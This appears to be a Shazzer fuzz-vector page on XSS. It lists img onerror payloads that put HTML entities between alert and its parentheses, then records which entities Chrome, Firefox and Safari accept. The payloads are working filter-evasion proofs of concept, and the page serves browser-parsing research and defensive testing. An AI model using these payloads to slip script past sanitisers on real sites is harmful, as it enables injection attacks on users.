Entities allowed between function calls

This vector uses Shazzer's new features to check which HTML entities are allowed between a function name and its call parentheses, using images. The results are still a bit inconsistent because I currently wait for page load.

Created by: hackvertor

Created on: 6/29/2024, 1:55:26 PM

Updated on: 7/14/2024, 11:55:35 PM

Vector type: XSS

Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">

Sample payloads

<img src=data: onerror="alert&ThinSpace;('&#38;ThinSpace;')">
<img src=data: onerror="alert&puncsp;('&#38;puncsp;')">
<img src=data: onerror="alert&MediumSpace;('&#38;MediumSpace;')">
<img src=data: onerror="alert&thinsp;('&#38;thinsp;')">
<img src=data: onerror="alert&hairsp;('&#38;hairsp;')">
<img src=data: onerror="alert&emsp;('&#38;emsp;')">
<img src=data: onerror="alert&NonBreakingSpace;('&#38;NonBreakingSpace;')">
<img src=data: onerror="alert&NewLine;('&#38;NewLine;')">
<img src=data: onerror="alert&emsp13;('&#38;emsp13;')">
<img src=data: onerror="alert&emsp14;('&#38;emsp14;')">
<img src=data: onerror="alert&ensp;('&#38;ensp;')">
<img src=data: onerror="alert&Tab;('&#38;Tab;')">
<img src=data: onerror="alert&nbsp;('&#38;nbsp;')">
<img src=data: onerror="alert&numsp;('&#38;numsp;')">
<img src=data: onerror="alert&VeryThinSpace;('&#38;VeryThinSpace;')">

Fuzz results

Chrome 126.0.0.0 desktop macOS 10.15.7
Found 8 results
&emsp;
&hairsp;
&MediumSpace;
&NewLine;
&NonBreakingSpace;
&puncsp;
&thinsp;
&ThinSpace;

Firefox 127.0 desktop macOS 10.15
Found 4 results
&emsp;
&emsp13;
&emsp14;
&ensp;

Safari 17.4 desktop macOS 10.15.7
Found 2 results
&emsp;
&Tab;

Safari 17.5 mobile iOS 17.5.1
Found 6 results
&emsp14;
&ensp;
&nbsp;
&numsp;
&Tab;
&VeryThinSpace;